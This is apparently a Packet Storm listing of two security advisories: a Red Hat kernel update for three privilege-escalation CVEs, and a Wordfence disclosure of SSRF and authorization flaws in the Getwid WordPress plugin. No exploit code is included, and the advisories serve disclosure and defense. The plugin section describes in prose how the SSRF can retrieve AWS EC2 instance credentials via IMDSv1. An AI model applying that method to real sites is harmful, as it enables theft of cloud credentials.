Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:3465-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3465  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: use-after-free in Netfilter nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Intel QAT Update - (kernel changes) (BZ#2176848)

* Significant performance drop for getrandom system call when FIPS is  
enabled (compared to RHEL 8) (BZ#2183477)

* Azure RHEL9 Backport upstream commit  
93827a0a36396f2fd6368a54a020f420c8916e9b [KVM: VMX: Fix crash due to  
uninitialized current_vmcs] (BZ#2186824)

* kernel[-rt]: task deadline_test:1778 blocked for more than 622 seconds  
(BZ#2188657)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.58.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kernel-5.14.0-70.58.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.58.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.58.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.58.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.58.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.58.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8fhdzjgjWX9erEAQjndA//UpRBwgHz32ghunmBO+fNfeWyHc8iYacs  
pblLL1XPHvdAIZQd/lNJ66EJt2GSNYOB1mLaem7ovXOFUpa/4GdKsFalxFSvyeRS  
msMDfjqt71Qa+iAa3u6+cn9GOgwjijUVjS6DtoMJzPNIIEViDEaYYVJNrxMyMVt9  
M+K/lETdq9SyVxXwWDQs47Y44677PJjGIf6rg8WPjgkZalEf94MxRLQ60pmM6AU0  
a77urCDLwioSGTxoJ5dzyPRxazJM+tqwWaZlsa37c0MB22yk9N+dIpmMhSU+yAPL  
OJQHxmCX3FfQkewlAq90Yc//zCUdmc/+XpUv+sBVOAcCuc3U9Mrhx7BY9YctUPNV  
V2ixlUEj2Rgr7b2boPJNWDM4lAS8WN4OEGcrpNbtYRHrNfS6+7pWcJXpO8s5S+ZU  
aUpRHq0mrWj7Vwew0YQFeO0l6dF40bWXAkvlWRfJyG2NQR6TGNuPDmgkxX1Kifbf  
+Xfsw/bljKkTSZajmiEjKC/0b6J8a2aeIsQZRTkf8g9OyZR6DJTNjdXd99Utwekb  
OaGpRUBoIottSNn1Su1jb3U+N85DBlGinAEEnfZVTur3GjO+o/Tx4bhgvm58WCy3  
t7OrMG0wh3Bx9W6QVnkwh374ejTkfsfN+n4mGnTiIWG1GiukbFSYYJuFipaGUcu5  
KKIPwXF9gSY=  
=sBr4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3465-01

WordPress Getwid Gutenberg Blocks plugin versions 1.8.3 and below suffer from improper authorization and server-side request forgery vulnerabilities.

    On April 6, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two vulnerabilities in Getwid – Gutenberg Blocks, a plugin installed on over 50,000 WordPress sites. The plugin’s developers responded immediately, and we sent over the full disclosure the same day. A patched version of the plugin, 1.8.4, was released on April 13, 2023.The most serious vulnerability had a high severity because it allows authenticated users to perform Server Side Request Forgery (SSRF), which can result in full access to the hosted instance on some cloud configurations. Additionally, it may allow further penetration into internal networks in some enterprise configurations. The other vulnerability is much lower in severity and allows authenticated users to clear and update the site’s template cache.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule protecting against the Server Side Request Forgery (SSRF) on April 6, 2023. Wordfence Free users received the same protection on May 6, 2023.READ THIS POST ON THE BLOGVulnerability Summary from Wordfence IntelligenceDescription: Getwid – Gutenberg Blocks <= 1.8.3 - Authenticated(Subscriber+) Server Side Request Forgery Affected Plugin: Getwid – Gutenberg BlocksPlugin Slug: getwidAffected Versions: <= 1.8.3CVE ID:CVE-2023-1895CVSS Score: 8.8 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:NResearcher/s: Ramuel Gall Fully Patched Version: 1.8.4The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to Server Side Request Forgery via the get_remote_content REST API endpoint in versions up to, and including, 1.8.3. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.Description: Getwid – Gutenberg Blocks <= 1.8.3 - Improper Authorization via get_remote_templates REST endpoint Affected Plugin: Getwid – Gutenberg BlocksPlugin Slug: getwidAffected Versions: <= 1.8.3CVE ID: CVE-2023-1910CVSS Score: 4.3 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NResearcher/s: Ramuel Gall Fully Patched Version: 1.8.4The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient capability check on the get_remote_templates function in versions up to, and including, 1.8.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to flush the remote template cache. Cached template information can also be accessed via this endpoint but these are not considered sensitive as they are publicly accessible from the developer's site.Technical AnalysisGetwid – Gutenberg Blocks is a plugin offering a library of pre-generated blocks which it makes available to plugin users and retrieves remotely from the developer’s server. Unfortunately, this remote retrieval functionality, which utilized the REST API, only required an authenticated user in vulnerable versions, meaning that even subscriber-level users could make use of it.While the rest routes for both vulnerabilities used a capability check in the permissions_check function, the capability checked was 'read', which all users, even subscribers, are assigned.register-rest functionality Pictured: The REST API Endpoints and the permissions_check functionOn its own this was not a significant issue, but the get_remote_content function also failed to validate the URL passed in, meaning it could be used to retrieve information from any location via the server.get_remote_content function Pictured: The get_remote_content functionOnly GET requests can be performed and the response data will only be rendered if it is JSON-formatted. However, sites hosted on Amazon AWS EC2 instances all have an endpoint which can be accessed internally and returns JSON-formatted credentials that can be used to access the instance.SSRF response Pictured: EC2 Credentials on a test box retrieved using this exploit. Click through to the blog post and then click on the image to see it at full sizeSites running on AWS EC2 instances using IMDS (Instance Metadata Service) version 1 are vulnerable to this attack, while IMDSv2 offers preventative measures that prevent successful exploitation.The second issue was significantly less severe and made use of the minimal capability check on the ‘get_remote_templates’ function. While this would likely have minimal impact on a site, it still compromises the site’s integrity to some extent.Disclosure TimelineApril 6, 2023 - The Wordfence Threat Intelligence team releases a firewall rule to Wordfence Premium, Wordfence Care, and Wordfence Response users and begins the responsible disclosure process. We send over the full disclosure to the developers.April 13, 2023 - The plugin developers release a patch in version 1.8.4 of Getwid.May 6, 2023 - Wordfence Free users receive the firewall rule.ConclusionIn this blog post, we detailed a Server Side Request Forgery (SSRF) vulnerability in Getwid version 1.8.3 and earlier. This vulnerability allows authenticated attackers with subscriber-level permissions or higher to send arbitrary GET requests from the website, which can be used to obtain critically sensitive information in some configurations. We also described a lower-severity vulnerability allowing subscribers to clear the local template cache.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting the SSRF vulnerability on April 6, 2023. Sites still using the free version of Wordfence received the same protection on May 6, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as the SSRF vulnerability poses a significant risk. If you or someone you know is hosted on AWS we also highly recommend migrating to IMDSv2 if you have not already, as it offers protection from not only this but the vast majority of SSRF vulnerabilities.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

Source

Packet Storm